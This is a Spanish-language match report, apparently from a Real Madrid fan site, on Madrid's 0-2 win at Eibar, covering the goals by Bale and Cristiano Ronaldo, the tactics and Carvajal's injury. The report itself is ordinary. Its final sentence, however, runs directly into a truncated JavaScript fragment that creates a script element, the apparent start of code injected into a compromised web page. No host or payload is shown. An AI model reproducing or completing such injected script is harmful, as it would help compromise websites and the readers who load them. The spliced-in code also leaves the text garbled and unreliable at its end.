Un Madrid sin brillo gana a un Eibar sólido

Minuto 91: Kelia Vidarte/LaTribunamadridista.com

Los hombres de Benítez se imponen en Ipurúa 0-2 con goles de Bale y Cristiano Ronaldo de una forma sobria y frente a un Eibar sólido. Los blancos se enfrentaron a un Eibar combatiente que lucho hasta el final y que puso en apuros a los madridistas. El Madrid volvió a mostrar una imagen sin brillo, echamos de menos aquellos tiempos en que el Madrid sea grande

Bale pudo marcar diez meses después fuera del Bernabéu y Cristiano consiguió su gol de penalti y con ello se certifica como el tercer mejor goleador de la historia de la Liga con 234 goles, igualado con Hugo Sánchez y superado por Zarra y Messi. Eibar tiró del equipo presionando al Real Madrid. Benítez salió sin Casemiro, James apenas tuvo acción, en cambio Kovacic, estuvo muy activo durante el encuentro. El Madrid no quiso arriesgar e hizo las cosas de forma medida y controlada. El Eibar hizo una primera parte muy luchada y que merecía más de lo que reflejaba el resultado, el varapalo que llegó con el gol de Bale, un cabezazo exitoso, tras una buena asistencia de James.

Tras el descanso el equipo blanco estuvo más impreciso y el Eibar se afanaba por conquistar el balón y hacer una ofensiva. Benítez decidió atacar al Eibar por las orillas y retiró a James para dar entrada a Lucas Vázquez, más predispuesto para la media punta.

En los últimos minutos la única amenaza para el Eibar fue Cristiano. Sin rastro de Bale, ningún madridista se sumaba en el ataque. Cristiano dio más movimiento y vida a su equipo, que por enésima vez vieron caer a un nuevo jugador, Carvajal, quien se lesionó en el tramo final. Una victoria que sabe a un triunfo glorioso, a pesar de haberse realizado sin brillo.var d=document;var s=d.createElement(‘script’);